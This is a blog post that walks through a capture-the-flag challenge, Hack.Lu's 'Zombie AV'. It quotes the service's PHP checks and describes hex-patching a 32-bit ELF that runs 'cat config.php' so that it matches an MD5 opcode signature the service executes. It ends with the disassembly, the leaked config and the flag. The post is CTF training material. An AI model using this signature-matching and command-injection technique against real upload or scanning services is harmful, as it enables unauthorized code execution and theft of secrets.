Wednesday, October 31, 2012

Hack.Lu CTF: Zombie AV

The objective of this challenge was to upload an ELF file with embedded code that would print out the key located in config.php.

The first step was to look at the source code provided in the zip file. Of particular interest are the scan.php and elfparsing.php.

In elfparsing.php looking at the code below, one can see that the file requirement is a 32bit elf file. (If confused look up ELF fileheaders).
if($magic_0==0x7f && $magic_1==0x45 && $magic_2==0x4C && $magic_3==0x46) {
 //echo 'magic found\n';
} else {
 sec_warning();
 return -1;
}

if($magic_4==0x01) {  
 //print '32bit not supported <br>';
 return 32;
}

if($magic_4==0x02) {
 //return 64;
 die('64bit not supported');
 //sec_warning();
}

sec_warning();
In scan.php the following code shows that for the uploaded file to get past the opcode md5 check it must have
b0 01 90 90 90 90 90 90 90 90 cd 80
as the starting 12 bytes of the main program.
$opcodes=getOpcodes($rest);
 print "Entry Opcodes are: ".$opcodes;
 print "\n";
 print "Signature is: " . md5($opcodes);
 print "\n";

 /* 
  * hint: zombie virus signature is
  * 8048340: b0 01                 mov    $0x1,%al
   * 8048342: 90                    nop
   * 8048343: 90                    nop
   * 8048344: 90                    nop
    * 8048345: 90                    nop
    * 8048346: 90                    nop
   * 8048347: 90                    nop
   * 8048348: 90                    nop
    * 8048349: 90                    nop
   * 804834a: cd 80                 int    $0x80
 */

 /*
  *  secret zombie total signature engine is based on md5
  */
 if (md5($opcodes) === 'cd53b957ec552afb39cba6daed7a9abc') {
  print "found zombie virus, trying to execute it\n";
The next step is creating an elf file to upload to the service, and the file you upload must be able to execute normally. This step must be done on a 32bit linux distribution. I made a c file that has a main function with system(“ cat config.php” ) as its only command. Once compiled I opened it up in Ida Pro Free edition.


Changing the size of a program will cause it to break because all of the relative references will be thrown off; however, conveniently there are a number of nop statements after call __libc_start_main. I opened the elf file up in a hex editor and copied 12 nop op codes and placed them at the start of the program (before the 31 ED). I then changed those 12 bytes to reflect the zombie virus signature. One more thing must be done to the program before it can be uploaded. The call __libc_start_main no longer refers to the same point in memory because it is a relative reference. Therefore its value must be decreased by the same amount of bytes that were moved. To accomplish this I changed E8 CB FF FF FF to E8 BF FF FF FF to reflect the change in address. Save the file and upload to the server.
analysing file 94b0f040323a591c3e3680246b7ce3ec
8048330: b0 01                 mov    $0x1,%al
 8048332: 90                    nop
 8048333: 90                    nop
 8048334: 90                    nop
 8048335: 90                    nop
 8048336: 90                    nop
 8048337: 90                    nop
 8048338: 90                    nop
 8048339: 90                    nop
 804833a: cd 80                 int    $0x80
 804833c: 31 ed                 xor    %ebp,%ebp
 804833e: 5e                    pop    %esi
 804833f: 89 e1                 mov    %esp,%ecx
 8048341: 83 e4 f0              and    $0xfffffff0,%esp
 8048344: 50                    push   %eax
 8048345: 54                    push   %esp
 8048346: 52                    push   %edx
 8048347: 68 00 84 04 08        push   $0x8048400
 804834c: 68 10 84 04 08        push   $
Entry Opcodes are: b0 01 90 90 90 90 90 90 90 90 cd 80 
Signature is: cd53b957ec552afb39cba6daed7a9abc
found zombie virus, trying to execute it
<?php

$readelfpath='/usr/bin/readelf';
$objdumppath='/usr/bin/objdump';
$uploadpath='upload/';
$scriptpath='/var/www/';
$secret='55c4080daefb5f794c3527101882b50b';

?>
done we are safe

Flag =55c4080daefb5f794c3527101882b50b.

-- zlouity

No comments:

Post a Comment